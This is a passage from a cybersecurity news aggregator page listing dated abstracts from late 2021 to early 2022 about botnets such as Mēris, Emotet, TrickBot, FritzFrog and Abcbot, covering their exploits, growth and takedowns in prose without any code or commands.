Vulnerable routers from MikroTik have been misused to form what cybersecurity researchers have called one of the largest botnet-as-a-service cybercrime operations seen in recent years. According to a new piece of research published by Avast, a cryptocurrency mining campaign leveraging the new-disrupted Glupteba botnet as well as the infamous TrickBot malware were all distributed using the same command-and-control (C2) server. "The C2 server serves as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers," Avast's senior malware researcher, Martin Hron, said in a write-up, potentially linking it to what's now called the Mēris botnet. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers ( CVE-2018-14847 ), enabling the attackers to gain unauthenticated, remote administrative access to any affected device. Parts of the Mēris botnet were sinkholed in late September 2021 . "The CVE-2018-The Hacker News
March 21, 2022
DirtyMoe modules expand the bot using worm-like techniques Full Text
Abstract
The DirtyMoe botnet continues to evolve and now includes a module that implements wormable propagation capabilities. In June 2021, researchers from Avast warned of the rapid growth of the DirtyMoe botnet (PurpleFox, Perkiler, and NuggetPhantom),...Security Affairs
March 18, 2022
Microsoft: Here’s how this notorious botnet used hacked routers for stealthy communication Full Text
Abstract
Microsoft has filled in one new detail about how the TrickBot gang's IoT C2 devices, namely compromised MikroTik routers, were being used since 2018 for stealthy communication with infected PCs.ZDNet
March 18, 2022
Russia-linked Cyclops Blink botnet targeting ASUS routers Full Text
Abstract
The recently discovered Cyclops Blink botnet, which is believed to be a replacement for the VPNFilter botnet, is now targeting the ASUS routers. The recently discovered Cyclops Blink botnet is now targeting the ASUS routers, reports Trend...Security Affairs
March 17, 2022
New Botnet Targets Linux Devices Via Log4J Vulnerability Full Text
Abstract
New B1txor20 botnet is actively exploiting Log4j flaws in Linux systems to create a bot army that helps hackers install rootkits and steal sensitive records. The bot sends the stolen information, results of any command execution, or any other information to its C2 server in form of a DNS reque ... Read MoreCyware Alerts - Hacker News
March 17, 2022
DirtyMoe Botnet Gains New Exploits in Wormable Module to Spread Rapidly Full Text
Abstract
The malware known as DirtyMoe has gained new worm-like propagation capabilities that allow it to expand its reach without requiring any user interaction, the latest research has found. "The worming module targets older well-known vulnerabilities, e.g., EternalBlue and Hot Potato Windows privilege escalation," Avast researcher Martin Chlumecký said in a report published Wednesday. "One worm module can generate and attack hundreds of thousands of private and public IP addresses per day; many victims are at risk since many machines still use unpatched systems or weak passwords." Active since 2016, the DirtyMoe botnet is used for carrying out cryptojacking and distributed denial-of-service (DDoS) attacks, and is deployed by means of external exploit kits like PurpleFox or injected installers of Telegram Messenger. Also employed as part of the attack sequence is a DirtyMoe service that triggers the launch of two additional processes, namely the Core andThe Hacker News
March 17, 2022
Sandworm-linked CyclopsBlink botnet has another piece of hardware in its sights Full Text
Abstract
Botnet activity that drew loud warnings last month from U.S. and U.K. cybersecurity agencies has expanded to a second type of hardware, according to researchers at Trend Micro.CyberScoop
March 17, 2022
B1txor20 Linux botnet use DNS Tunnel and Log4J exploit Full Text
Abstract
Researchers uncovered a new Linux botnet, tracked as B1txor20, that exploits the Log4J vulnerability and DNS tunnel. Researchers from Qihoo 360's Netlab have discovered a new backdoor used to infect Linux systems and include them in a botnet tracked...Security Affairs
March 16, 2022
New “B1txor20” Linux Botnet Uses DNS Tunnel and Exploits Log4J Flaw Full Text
Abstract
A previously undocumented backdoor has been observed targeting Linux systems with the goal of corralling the machines into a botnet and acting as a conduit for downloading and installing rootkits. Qihoo 360's Netlab security team called it B1txor20 "based on its propagation using the file name 'b1t,' the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes." First observed propagating through the Log4j vulnerability on February 9, 2022, the malware leverages a technique called DNS tunneling to build communication channels with command-and-control (C2) servers by encoding data in DNS queries and responses. B1txor20, while also buggy in some ways, currently supports the ability to obtain a shell, execute arbitrary commands, install a rootkit, open a SOCKS5 proxy , and functions to upload sensitive information back to the C2 server. Once a machine is successfully compromised, the malware utilizes the DNS tunnel to retrieve and execute coThe Hacker News
March 15, 2022
New Linux botnet exploits Log4J, uses DNS tunneling for comms Full Text
Abstract
A recently discovered botnet under active development targets Linux systems, attempting to ensnare them into an army of bots ready to steal sensitive info, installing rootkits, creating reverse shells, and acting as web traffic proxies.BleepingComputer
March 10, 2022
New Emotet botnet is rapidly growing, with +130K unique bots spread across 179 countries Full Text
Abstract
A few months after its return the Emotet botnet has already infected over 130,000 unique bots spread across 179 countries. The Emotet botnet continues to grow and has infected approximately 130,000 hosts since its resurrection in November 2021. Early...Security Affairs
March 09, 2022
Emotet Botnet’s Latest Resurgence Spreads to Over 100,000 Computers Full Text
Abstract
The insidious Emotet botnet, which staged a return in November 2021 after a 10-month-long hiatus, is once again exhibiting signs of steady growth, amassing a swarm of over 100,000 infected hosts for perpetrating its malicious activities. "While Emotet has not yet attained the same scale it once had, the botnet is showing a strong resurgence with a total of approximately 130,000 unique bots spread across 179 countries since November 2021," researchers from Lumen's Black Lotus Labs said in a report. Emotet, prior to its takedown in late January 2021 as part of a coordinated law enforcement operation dubbed "Ladybird," had infected no fewer than 1.6 million devices globally, acting as a conduit for cybercriminals to install other types of malware, such as banking trojans or ransomware, onto compromised systems. The malware officially resurfaced in November 2021 using TrickBot as a delivery vehicle, with the latter shuttering its attack infrastructureThe Hacker News
March 9, 2022
Updated SharkBot Variant Makes its Way into Google Play Store Full Text
Abstract
Researchers exposed cybercriminals distributing the SharkBot banking trojan via Google Play Store. The malware is using Automatic Transfer Systems (ATS) to transfer money by abusing the Accessibility permission on devices and grants itself additional required permissions. Smartphone users are reque ... Read MoreCyware Alerts - Hacker News
March 08, 2022
Emotet growing slowly but steadily since November resurgence Full Text
Abstract
The notorious Emotet botnet is still being distributed steadily in the wild, having now infected 130,000 systems in 179 countries.BleepingComputer
March 4, 2022
Massive Meris Botnet Embeds Ransomware Notes from REvil Full Text
Abstract
Notes threatening to tank targeted companies’ stock price were embedded into the DDoS ransomware attacks as a string_of_text directed to CEOs and webops_geeks in the URL.Threatpost
March 2, 2022
TrickBot’s AnchorDNS is Now Upgraded to AnchorMail Full Text
Abstract
Researchers identified an improved version of the AnchorDNS backdoor, dubbed AnchorMail, being used in Conti ransomware attacks. Post-execution, AnchorMail creates a scheduled task for persistence that runs every 10 minutes. Experts recommend training your employees to spot phishing emails is ... Read MoreCyware Alerts - Hacker News
March 1, 2022
What Does TrickBot’s Shutdown Imply? Full Text
Abstract
After months of inactivity, operators behind the TrickBot malware botnet appear to went offline with their server infrastructure. Its TTPs were becoming highly detectable. Going by experts, the decline in the volume of the Trickbot campaigns is accompanied by the fact that its operators are w ... Read MoreCyware Alerts - Hacker News
February 28, 2022
Electron Bot Leverages Microsoft App Store to Pierce Social Media Accounts Full Text
Abstract
An SEO poisoning bot has been taking over social media accounts and masquerading as the Temple Run game. The bot targets multiple social media accounts such as Facebook, Google, and SoundCloud.Cyware Alerts - Hacker News
February 28, 2022
Reborn of Emotet: New Features of the Botnet and How to Detect it Full Text
Abstract
One of the most dangerous and infamous threats is back again. In January 2021, global officials took down the botnet. Law enforcement sent a destructive update to the Emotet's executables. And it looked like the end of the trojan's story. But the malware never ceased to surprise. November 2021, it was reported that TrickBot no longer works alone and delivers Emotet. And ANY.RUN with colleagues in the industry were among the first to notice the emergence of Emotet's malicious documents. First Emotet malicious documents And this February, we can see a very active wave with crooks running numerous attacks, hitting the top in the rankings. If you are interested in this topic or researching malware, you can make use of the special help of ANY.RUN , the interactive sandbox for the detection and analysis of cyber threats. Let's look at the new version's changes that this disruptive malware brought this time. Emotet history Emotet is a sophisticated, constantlyThe Hacker News
February 24, 2022
Notorious TrickBot Malware Gang Shuts Down its Botnet Infrastructure Full Text
Abstract
The modular Windows crimeware platform known as TrickBot formally shuttered its infrastructure on Thursday after reports emerged of its imminent retirement amid a lull in its activity for almost two months, marking an end to one of the most persistent malware campaigns in recent years. "TrickBot is gone... It is official now as of Thursday, February 24, 2022. See you soon... or not," AdvIntel's CEO Vitali Kremez tweeted . "TrickBot is gone as it has become inefficient for targeted intrusions." Attributed to a Russia-based criminal enterprise called Wizard Spider , TrickBot started out as a financial trojan in late 2016 and is a derivative of another banking malware called Dyre that was dismantled in November 2015. Over the years, it morphed into a veritable Swiss Army knife of malicious capabilities, enabling threat actors to steal information via web injects and drop additional payloads. TrickBot's activities took a noticeable hit in October 20The Hacker News
February 24, 2022
U.S., U.K. Agencies Warn of New Russian Botnet Built from Hacked Firewall Devices Full Text
Abstract
Intelligence agencies in the U.K. and the U.S. disclosed details of a new botnet malware called Cyclops Blink that's been attributed to the Russian-backed Sandworm hacking group and deployed in attacks dating back to 2019. "Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, which exploited network devices, primarily small office/home office (SOHO) routers, and network-attached storage (NAS) devices," the agencies said . "In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread." The joint government advisory comes from the U.K. National Cyber Security Centre (NCSC), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) in the U.S. Sandworm , aka Voodoo Bear, is the name assigned to a highly advanced adversary operating out of Russia that's known to be active since at least 2008.The Hacker News
February 21, 2022
Is Conti Behind the TrickBot Operation? Full Text
Abstract
In new findings, the operators of the TrickBot trojan appear to have collaborated with the creators of the Conti ransomware. The reason behind this development could be the multiple takedown attempts on the TrickBot infrastructure. However, as per claims, the bot is dead; and moving forward they w ... Read MoreCyware Alerts - Hacker News
February 20, 2022
Trickbot operation is now controlled by Conti ransomware Full Text
Abstract
The Conti ransomware group takes over TrickBot malware operation and plans to replace it with BazarBackdoor malware. TrickBot operation has arrived at the end of the journey, according to AdvIntel some of its top members move under the Conti ransomware...Security Affairs
February 18, 2022
New Golang botnet empties Windows users’ cryptocurrency wallets Full Text
Abstract
A new Golang-based botnet under active development has been ensnaring hundreds of Windows devices each time its operators deploy a new command and control (C2) server.BleepingComputer
February 18, 2022
Updated Trickbot Now Targets Technology and Financial Firms Full Text
Abstract
Check Point disclosed that an updated version of the TrickBot malware is targeting customers of 60 financial and technology firms primarily located in the U.S. Researchers believe that the actual victims are not the brands themselves but their customers. The malware stands as a priority threat ... Read MoreCyware Alerts - Hacker News
February 17, 2022
Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators Full Text
Abstract
Newborn as it is, the Kraken botnet has already spread like wildfire, thanks to the malware’s author tinkering away over the past few months, adding more infostealers and backdoors.Threatpost
February 17, 2022
Researchers Warn of a New Golang-based Botnet Under Continuous Development Full Text
Abstract
Cybersecurity researchers have unpacked a new Golang-based botnet called Kraken that's under active development and features an array of backdoor capabilities to siphon sensitive information from compromised Windows hosts. "Kraken already features the ability to download and execute secondary payloads, run shell commands, and take screenshots of the victim's system," threat intelligence firm ZeroFox said in a report published Wednesday. Discovered first in October 2021, early variants of Kraken have been found to be based on source code uploaded to GitHub, although it's unclear if the repository in question belongs to the malware's operators or if they simply chose to start their development using the code as a foundation. The botnet – not to be confused with a 2008 botnet of the same name – is perpetuated using SmokeLoader , which chiefly acts as a loader for next-stage malware, allowing it to quickly scale in size and expand its network. KrakenThe Hacker News
February 17, 2022
New Kraken botnet is allowing operators to earn USD 3,000 every month Full Text
Abstract
Researchers spotted a new Golang-based botnet called Kraken that is under active development and supports a lot of backdoor capabilities. Kraken is a new Golang-based botnet discovered in late October 2021 by researchers from threat intelligence...Security Affairs
February 16, 2022
TrickBot Ravages Customers of Amazon, PayPal and Other Top Brands Full Text
Abstract
The resurgent trojan has targeted 60 top companies to harvest credentials for a wide range of applications, with an eye to virulent follow-on attacks.Threatpost
February 16, 2022
Trickbot targets customers of 60 High-Profile companies Full Text
Abstract
TrickBot malware is targeting customers of 60 financial and technology companies with new anti-analysis features. The infamous TrickBot malware was employed in attacks against customers of 60 financial and technology companies with new anti-analysis...Security Affairs
February 16, 2022
Trickbot has infected 140,000-plus machines since late 2020 Full Text
Abstract
In October 2020, Microsoft reported that more than 90% of Trickbot's infrastructure had been disabled. However, the threat actor bounced back and began thriving soon after.Tech Target
February 15, 2022
Watch Out! FritzFrog Botnet Has Gone Aggressively Wild Full Text
Abstract
The operators of the FritzFrog botnet have returned with a new P2P campaign, registering a 10x growth in the infection rate within only a month. The new variant seems to possess additional capabilities to target WordPress servers. Researchers have spotted 24,000 attacks so far. However, the b ... Read MoreCyware Alerts - Hacker News
February 14, 2022
TrickBot Uses Metaprogramming in BazarBackdoor Malware Full Text
Abstract
In a new twist, authors of BazarLoader and BazarBackdoor malware were spotted utilizing template-based metaprogramming to obfuscate important data. Researchers found similar code patterns in malware samples as is found when samples are built using ADVobfuscator, an obfuscation library based on C++1 ... Read MoreCyware Alerts - Hacker News
February 11, 2022
FritzFrog P2P Botnet is back and targets Healthcare, Education and Government Sectors Full Text
Abstract
FritzFrog P2P botnet is back and is targeting servers belonging to entities in the healthcare, education, and government sectors. FritzFrog is a sophisticated botnet that was involved in attacks against SSH servers worldwide since January 2020. The...Security Affairs
February 10, 2022
FritzFrog P2P Botnet Attacking Healthcare, Education and Government Sectors Full Text
Abstract
A peer-to-peer Golang botnet has resurfaced after more than a year to compromise servers belonging to entities in the healthcare, education, and government sectors within a span of a month, infecting a total of 1,500 hosts. Dubbed FritzFrog , "the decentralized botnet targets any device that exposes an SSH server — cloud instances, data center servers, routers, etc. — and is capable of running any malicious payload on infected nodes," Akamai researchers said in a report shared with The Hacker News. The new wave of attacks commenced in early December 2021, only to pick up pace and register a 10x growth in its infection rate in a month's time, while peaking at 500 incidents per day in January 2022. The cybersecurity firm said it detected infected machines in a European television channel network, a Russian manufacturer of healthcare equipment, and multiple universities in East Asia. FritzFrog was first documented by Guardicore in August 2020, elaborating the botnet&The Hacker News
February 10, 2022
FritzFrog botnet grows 10x, hits healthcare, edu, and govt systems Full Text
Abstract
The FritzFrog botnet that's been active for more than two years has resurfaced with an alarming infection rate, growing ten times in just a month of hitting healthcare, education, and government systems with an exposed SSH server.BleepingComputer
February 3, 2022
BotenaGo Source Code Leaked - What does it Mean? Full Text
Abstract
AT&T experts unearthed the new BotenaGo botnet, which leaked on GitHub last year. It could target 33 exploits affecting nearly 2 million routers and IoT devices. Experts also discovered several hacking tools—from several sources—in the same GitHub repository. The leak of such ready-to-use ... Read MoreCyware Alerts - Hacker News
January 31, 2022
TrickBot Operators Strengthen Obfuscation Game with Layered Security Full Text
Abstract
The TrickBot gang has advanced its techniques to slip past security controls by adding multiple layers of defense. This enables it to launch Man-in-the-Browser attacks against banking users to steal their credentials and browser cookies. It is critical for organizations and researchers to cont ... Read MoreCyware Alerts - Hacker News
January 27, 2022
BotenaGo Botnet Code Leaked to GitHub, Impacting Millions of Devices Full Text
Abstract
The malware had already put millions of routers and IoT devices at risk, and now any noob can have at it.Threatpost
January 27, 2022
Widespread FluBot and TeaBot Malware Campaigns Targeting Android Devices Full Text
Abstract
Researchers from the Bitdefender Mobile Threats team said they have intercepted more than 100,000 malicious SMS messages attempting to distribute Flubot malware since the beginning of December. "Findings indicate attackers are modifying their subject lines and using older yet proven scams to entice users to click," the Romanian cybersecurity firm detailed in a report published Wednesday. "Additionally, attackers are rapidly changing the countries they are targeting in this campaign." The new wave of attacks is said to have been most active in Australia, Germany, Poland, Spain, Austria, and Italy, among others, with attacks spreading to newer countries like Romania, the Netherlands, and Thailand starting mid-January. FluBot (aka Cabassous) campaigns use smishing as the primary delivery method to target potential victims, wherein users receive an SMS message with the question "Is this you in this video?" and are tricked into clicking a link that instThe Hacker News
January 26, 2022
TrickBot Crashes Security Researchers’ Browsers in Latest Upgrade Full Text
Abstract
The malware has added an anti-debugging tool that crashes browser tabs when researchers use code beautifying for analysis.Threatpost
January 26, 2022
Threat Actors Blanket Androids with Flubot, Teabot Campaigns Full Text
Abstract
Attackers are getting creative, using smishing & a malicious Google Play QR reader to plant banking trojans on the phones of victims across the globe.Threatpost
January 26, 2022
New FluBot and TeaBot campaigns target Android devices worldwide Full Text
Abstract
New FluBot and TeaBot malware distribution campaigns have been spotted, using typical smishing lures or laced apps against Android users in Australia, Germany, Poland, Spain, and Romania.BleepingComputer
January 25, 2022
TrickBot now crashes researchers’ browsers to block malware analysis Full Text
Abstract
The notorious TrickBot malware has received new features that make it more challenging to research, analyze, and detect in the latest variants, including crashing browser tabs when it detects beautified scripts.BleepingComputer
January 25, 2022
TrickBot Operators Bolster Layered Defenses to Prevent Injection Research Full Text
Abstract
The operators behind the notorious TrickBot malware have once again updated their evasion techniques by adding multiple layers of defense to slip past antimalware products.Security Intelligence
January 23, 2022
Emotet Now Using Unconventional IP Address Formats to Evade Detection Full Text
Abstract
Social engineering campaigns involving the deployment of the Emotet malware botnet have been observed using "unconventional" IP address formats for the first time in a bid to sidestep detection by security solutions. This involves the use of hexadecimal and octal representations of the IP address that, when processed by the underlying operating systems, get automatically converted "to the dotted decimal quad representation to initiate the request from the remote servers," Trend Micro's Threat Analyst, Ian Kenefick, said in a report Friday. The infection chains, as with previous Emotet-related attacks, aim to trick users into enabling document macros and automate malware execution. The document uses Excel 4.0 Macros, a feature that has been repeatedly abused by malicious actors to deliver malware. Once enabled, the macro invokes a URL that's obfuscated with carets, with the host incorporating a hexadecimal representation of the IP address — "hThe Hacker News
January 14, 2022
Researchers Reveal Abcbot’s Connection With Xanthe Malware Full Text
Abstract
Cado Security confirmed a link between the Abcbot botnet and cryptomining attacks by the Xanthe malware group after analyzing similarities within the code and feature-sets of both the malware families. Experts added that cybercriminals could be slowly doing away with cryptomining attacks to adopt ... Read MoreCyware Alerts - Hacker News
January 10, 2022
Abcbot Botnet Linked to Operators of Xanthe Cryptomining malware Full Text
Abstract
New research into the infrastructure behind an emerging DDoS botnet named Abcbot has uncovered links with a cryptocurrency-mining botnet attack that came to light in December 2020. Attacks involving Abcbot, first disclosed by Qihoo 360's Netlab security team in November 2021, are triggered via a malicious shell script that targets insecure cloud instances operated by cloud service providers such as Huawei, Tencent, Baidu, and Alibaba Cloud to download malware that co-opts the machine to a botnet, but not before terminating processes from competing threat actors and establishing persistence. The shell script in question is itself an iteration of an earlier version originally discovered by Trend Micro in October 2021 hitting vulnerable ECS instances inside Huawei Cloud. But in an interesting twist, continued analysis of the botnet by mapping all known Indicators of Compromise (IoCs), including IP addresses, URLs, and samples, has revealed Abcbot's code and feature-leveThe Hacker News
January 10, 2022
Abcbot and Xanthe botnets have the same origin, experts discovered Full Text
Abstract
Experts linked the C2 infrastructure behind an the Abcbot botnet to a cryptocurrency-mining botnet attack that was uncovered in December 2020. Experts linked the infrastructure used by the Abcbot DDoS botnet to the operations of a cryptocurrency-mining...Security Affairs
December 29, 2021
Threat Advisory: E-commerce Bots Use Domain Registration Services for Mass Account Fraud Full Text
Abstract
Jason Kent, hacker-in-residence at Cequence Security, discusses sneaky shopping bot tactics (i.e., domain parking) seen in a mass campaign, and what retail security teams can do about them.Threatpost
December 24, 2021
Bots are stealing Christmas! Full Text
Abstract
Past research has shown that attacks originating from China are typically near the top of any botting activity list, but during this time period, China was 6th at only 2.3% of overall bad bot traffic.Help Net Security
December 22, 2021
A new version of the Abcbot bot targets Chinese cloud providers Full Text
Abstract
Researchers spotted a new botnet named Abcbot hat that mainly targeted Chinese cloud hosting providers over the past months. Security researchers discovered a new botnet, named Abcbot, that focused on Chinese cloud hosting providers over the past...Security Affairs
December 21, 2021
New Abcbot Botnet Targets Linux Servers Hosted by Alibaba Cloud, Huawei Cloud, Tencent, and Baidu Full Text
Abstract
Cado Security said in a report that the botnet has targeted servers hosted by Alibaba Cloud, Baidu, Tencent, and Huawei Cloud, echoing previous findings from Trend Micro and Qihoo 360 Netlab.The Record
December 17, 2021
Phorpiex botnet is back, in 2021 it $500K worth of crypto assets Full Text
Abstract
Experts reported the resurgence of the Phorpiex botnet, in one year it allowed to steal crypto assets worth of half a million dollars. Experts at Check Point Research have monitored the resurgence of the Phorpiex botnet, an old threat that was involved...Security Affairs
December 16, 2021
New Phorpiex Botnet Variant Steals Half a Million Dollars in Cryptocurrency Full Text
Abstract
Cryptocurrency users in Ethiopia, Nigeria, India, Guatemala, and the Philippines are being targeted by a new variant of the Phorpiex botnet called Twizt that has resulted in the theft of virtual coins amounting to $500,000 over the last one year. Israeli security firm Check Point Research, which detailed the attacks, said the latest evolutionary version "enables the botnet to operate successfully without active [command-and-control] servers," adding it supports no less than 35 wallets associated with different blockchains, including Bitcoin, Ethereum, Dash, Dogecoin, Litecoin, Monero, Ripple, and Zilliqa, to facilitate crypto theft. Phorpiex , otherwise known as Trik, is known for its sextortion spam and ransomware campaigns as well as cryptojacking, a scheme that leverages the targets' devices such as computers, smartphones, and servers to secretly mine cryptocurrency without their consent or knowledge. It's also infamous for its use of a technique called cryThe Hacker News
December 16, 2021
Phorpiex botnet returns with new tricks making it harder to disrupt Full Text
Abstract
The previously shutdown Phorpiex botnet has re-emerged with new peer-to-peer command and control infrastructure, making the malware more difficult to disrupt.BleepingComputer
December 16, 2021
Variant of Phorpiex Botnet Used for Cryptocurrency Attacks in Ethopia, Nigeria, India, and 93 Other Countries Full Text
Abstract
The cybercriminals behind the attacks are using a variant of the Phorpiex botnet -- dubbed "Twizt" -- to steal cryptocurrency through a process called "crypto clipping" from users across 96 countries.ZDNet
December 13, 2021
Two Linux botnets already exploit Log4Shell flaw in Log4j Full Text
Abstract
Immediately after the disclosure of the Log4Shell flaw in Log4j library threat actors started including the exploit code in Linux botnets. Researchers at NetLab 360 reported that their Anglerfish and Apacket honeypots were already hit by attacks...Security Affairs
December 11, 2021
Moobot Botnet Eyes Hikvision Products Full Text
Abstract
Moobot, a Mirai-based botnet, is reportedly abusing a critical flaw in the webserver of many Hikvision products, which were sanctioned by the U.S. in the wake of human rights abuse. The botnet is abusing a critical command injection flaw to target unpatched devices and extract sensitive data from v ... Read MoreCyware Alerts - Hacker News
December 9, 2021
Fueled by Pandemic Realities, Grinchbots Aggressively Surge in Activity Full Text
Abstract
E-commerce’s proverbial Who-ville is under siege, with a rise in bots bent on ruining gift cards and snapping up coveted gifts for outrageously priced resale.Threatpost
December 9, 2021
Dark Mirai botnet spreads targeting RCE on TP-Link routers Full Text
Abstract
A botnet tracked as Dark Mirai spreads by exploiting a new vulnerability affecting TP-Link TL-WR840N EU V5 home routers. Dark Mirai botnet spreads by exploiting a new vulnerability, tracked as CVE-2021-41653, affecting TP-Link TL-WR840N EU V5 home...Security Affairs
December 09, 2021
Dark Mirai botnet targeting RCE on popular TP-Link router Full Text
Abstract
The botnet known as Dark Mirai (aka MANGA) has been observed exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular inexpensive home router released in 2017.BleepingComputer
December 9, 2021
Moobot botnet spreads by exploiting CVE-2021-36260 flaw in Hikvision products Full Text
Abstract
Moobot is a Mirai-based botnet that is leveraging a critical command injection vulnerability in the webserver of some Hikvision products. The Mirai-based Moobot botnet is rapidly spreading by exploiting a critical command injection flaw, tracked...Security Affairs
December 08, 2021
Google Disrupts Blockchain-based Glupteba Botnet; Sues Russian Hackers Full Text
Abstract
Google on Tuesday said it took steps to disrupt the operations of a sophisticated "multi-component" botnet called Glupteba that approximately infected more than one million Windows computers across the globe and stored its command-and-control server addresses on Bitcoin's blockchain as a resilience mechanism. As part of the efforts, Google's Threat Analysis Group (TAG) said it partnered with the CyberCrime Investigation Group over the past year to terminate around 63 million Google Docs that were observed to have distributed the malware, alongside 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts that were associated with its distribution. Google TAG said it worked with internet infrastructure providers and hosting providers, such as CloudFlare, to dismantle the malware by taking down servers and placing interstitial warning pages in front of the malicious domains. In tandem, the internet giant also announced a lawsuit against two Russian indiThe Hacker News
December 08, 2021
140,000 Reasons Why Emotet is Piggybacking on TrickBot in its Return from the Dead Full Text
Abstract
The operators of TrickBot malware have infected an estimated 140,000 victims across 149 countries a little over a year after attempts were to dismantle its infrastructure, even as the malware is fast becoming an entry point for Emotet, another botnet that was taken down at the start of 2021. Most of the victims detected since November 1, 2020, are from Portugal (18%), the U.S. (14%), and India (5%), followed by Brazil (4%), Turkey (3%), Russia (3%), and China (3%), Check Point Research noted in a report shared with The Hacker News, with government, finance, and manufacturing entities emerging the top affected industry verticals. "Emotet is a strong indicator of future ransomware attacks, as the malware provides ransomware gangs a backdoor into compromised machines," said the researchers, who detected 223 different Trickbot campaigns over the course of the last six months. Both TrickBot and Emotet are botnets, which are a network of internet-connected devices infected byThe Hacker News
December 8, 2021
Identity Verification Company Incode Raises $220 Million at $1.25 Billion Valuation Full Text
Abstract
The funding round was led by General Atlantic and SoftBank, but Capital One Ventures, Coinbase Ventures, J.P. Morgan, and SVCI also participated, along with other existing investors.Security Week
December 08, 2021
Moobot botnet spreading via Hikvision camera vulnerability Full Text
Abstract
A Mirai-based botnet called 'Moobot' is spreading aggressively via exploiting a critical command injection flaw in the webserver of many Hikvision products.BleepingComputer
December 7, 2021
Google disrupts the Glupteba botnet Full Text
Abstract
Google announced to have disrupted the Glupteba botnet, a huge infrastructure composed of more than 1 million Windows PCs worldwide. Google announced to have taken down the infrastructure operated by the Glupteba, it also sued Russian nationals Dmitry...Security Affairs
December 07, 2021
Google files lawsuit against Russian hackers as part of disrupting botnet Full Text
Abstract
Google on Tuesday announced it is pursuing litigation to disrupt a botnet run by operators based out of Russia, among other steps meant to crack down on the group.The Hill
December 2, 2021
AT&T Takes Steps to Mitigate Botnet Found Inside Its Network Full Text
Abstract
AT&T is battling a modular malware called EwDoor on 5,700 VoIP servers, but it could have a larger wildcard certificate problem.Threatpost
December 1, 2021
TrickBot Again (But With a Twist) Checks Screen Resolution to Avoid Detection Full Text
Abstract
The Trickbot gang is once again doing a screen resolution check to identify virtual machines before deploying payloads, and hence trying to stay under the radar with its improved techniques. Experts say it is for the first time that a gang is using a script in an HTML attachment to check for screen ... Read MoreCyware Alerts - Hacker News
December 01, 2021
New EwDoor Botnet Targeting Unpatched AT&T Network Edge Devices Full Text
Abstract
A newly discovered botnet capable of staging distributed denial-of-service (DDoS) attacks targeted unpatched Ribbon Communications (formerly Edgewater Networks) EdgeMarc appliances belonging to telecom service provider AT&T by exploiting a four-year-old flaw in the network appliances. Chinese tech giant Qihoo 360's Netlab network security division, which detected the botnet first on October 27, 2021, called it EwDoor , noting it observed 5,700 compromised IP addresses located in the U.S. during a brief three-hour window. "So far, the EwDoor in our view has undergone three versions of updates, and its main functions can be summarized into two main categories of DDoS attacks and backdoor," the researchers noted . "Based on the attacked devices are telephone communication related, we presume that its main purpose is DDoS attacks, and gathering of sensitive information, such as call logs." Propagating through a flaw in EdgeMarc devices, EwDoor supports aThe Hacker News
November 30, 2021
Finland Faces Blizzard of Flubot-Spreading Text Messages Full Text
Abstract
Millions of texts leading to the Flubot spyware/banking trojan are targeting everyone who uses Androids in the country, in an “exceptional” attack.Threatpost
November 30, 2021
New EwDoor Botnet is targeting AT&T customers Full Text
Abstract
360 Netlab experts spotted a new botnet dubbed EwDoor that infects unpatched AT&T enterprise network edge devices. Experts from Qihoo 360's Network Security Research Lab discovered a new botnet, dubbed EwDoor, that targets AT&T customers...Security Affairs
November 30, 2021
EwDoor botnet targets AT&T network edge devices at US firms Full Text
Abstract
A recently discovered botnet is attacking unpatched AT&T enterprise network edge devices using exploits for a four-year-old critical severity Blind Command Injection security flaw.BleepingComputer
November 19, 2021
Emotet botnet comeback orchestrated by Conti ransomware gang Full Text
Abstract
The Emotet botnet is back by popular demand, resurrected by its former operator, who was convinced by members of the Conti ransomware gang.BleepingComputer
November 16, 2021
Notorious Emotet Botnet Makes a Comeback with the Help of TrickBot Malware Full Text
Abstract
The notorious Emotet malware is staging a comeback of sorts nearly 10 months after a coordinated law enforcement operation dismantled its command-and-control infrastructure in late January 2021. According to a new report from security researcher Luca Ebach, the infamous TrickBot malware is being used as an entry point to distribute what appears to be a new version of Emotet on systems previously infected by the former. The latest variant takes the form of a DLL file, with the first occurrence of the deployment being detected on November 14. Europol dubbed Emotet as the "world's most dangerous malware" for its ability to act as a "door opener" for threat actors to obtain unauthorized access, becoming a precursor to many critical data theft and ransomware attacks. Interestingly, the loader operation enabled other malware families such as Trickbot, QakBot, and Ryuk to enter a machine. The resurfacing is also significant not least because it followThe Hacker News
November 15, 2021
Emotet malware is back and rebuilding its botnet via TrickBot Full Text
Abstract
The Emotet malware was considered the most widely spread malware in the past, using spam campaigns and malicious attachments to distribute the malware.BleepingComputer
November 12, 2021
Qbot Spam Campaigns Continue to Explode Full Text
Abstract
According to researchers from Kaspersky, in the first seven months of 2021, the number of users affected by the QBot, which was first discovered in 2007, jumped to 65% compared to the previous year.Cyware Alerts - Hacker News
November 11, 2021
Abcbot — A New Evolving Wormable Botnet Malware Targeting Linux Full Text
Abstract
Researchers from Qihoo 360's Netlab security team have released details of a new evolving botnet called " Abcbot " that has been observed in the wild with worm-like propagation features to infect Linux systems and launch distributed denial-of-service (DDoS) attacks against targets. While the earliest version of the botnet dates back to July 2021, new variants observed as recently as October 30 have been equipped with additional updates to strike Linux web servers with weak passwords and are susceptible to N-day vulnerabilities, including a custom implementation of DDoS functionality, indicating that the malware is under continuous development. Netlab's findings also build on a report from Trend Micro early last month, which publicized attacks targeting Huawei Cloud with cryptocurrency-mining and cryptojacking malware. The intrusions were also notable for the fact that the malicious shell scripts specifically disabled a process designed to monitor and scan the serThe Hacker News
November 11, 2021
BotenaGo botnet targets millions of IoT devices with 33 exploits Full Text
Abstract
A new BotenaGo malware botnet has been discovered using over thirty exploits to attack millions of routers and IoT devices.BleepingComputer
November 11, 2021
TrickBot Operators Partner with Shathak Attackers for Conti Ransomware Full Text
Abstract
